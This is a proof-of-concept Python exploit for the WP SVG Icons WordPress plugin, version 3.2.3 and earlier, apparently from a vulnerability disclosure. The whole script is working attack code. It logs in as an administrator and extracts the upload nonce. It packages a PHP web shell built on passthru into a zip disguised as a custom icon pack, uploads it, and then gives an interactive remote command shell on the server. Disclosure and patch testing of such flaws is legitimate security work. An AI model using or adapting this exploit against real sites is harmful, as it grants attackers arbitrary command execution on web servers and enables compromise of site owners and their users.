WP SVG Icons <= 3.2.3 - Admin+ Remote Code Execution (RCE)

Proof of Concept

import requests
import zipfile

BASE_URL = "http://localhost:8000"
id = "wordpress"
pw = "wordpress"

def login(id, pw) :
    # Phase : Login (because, we need a nonce value)
    sess = requests.Session()
    sess.post(
        BASE_URL + "/wp-login.php",
        data = {
            'log': id,
            'pwd': pw,
            'wp-submit': '%EB%A1%9C%EA%B7%B8%EC%9D%B8',
            'testcookie': '1'
        }
    ).text
    
    return sess

def exploit(sess) : 
    res = sess.get(
        BASE_URL + "/wp-admin/admin.php?page=wp-svg-icons-custom-set"
    ).text

    res = res[res.find('''wp_svg_icons_upload_validation" value=''') + 39:]
    _nonce = res[:res.find('"')]


    with open("shellcode.php", "wb") as f :
        f.write(b"<?php echo(passthru($_REQUEST['qerogram'])); ?>")
    
    with open("selection.json", "w") as f :
        f.write("{}")

    with zipfile.ZipFile("output.zip", "w") as ZIP :
        ZIP.write(
            "shellcode.php",
            compress_type=zipfile.ZIP_DEFLATED
        )
        ZIP.write(
            "selection.json",
            compress_type=zipfile.ZIP_DEFLATED
        )
    
    sess.post(
        BASE_URL + "/wp-admin/admin.php?page=wp-svg-icons-custom-set",
        data = {
            "wp_http_referer" : "/wp-admin/admin.php?page=wp-svg-icons-custom-set",
            "wp_svg_icons_upload_validation" : _nonce
        },
        files = {
            "custom_icon_pack" : ("qerogram.zip", open("output.zip", "rb"))
        }
    )

    
    while True :
        prompt = input("$ ")
        if prompt.lower() == "exit" or prompt.lower() == "quit" :
            break
        
        res = sess.post(
            BASE_URL + "/wp-content/uploads/wp-svg-icons/custom-pack/shellcode.php",
            data = {
                "qerogram" : prompt
            }
        )
        print(res.text)


sess = login(id, pw)
exploit(sess)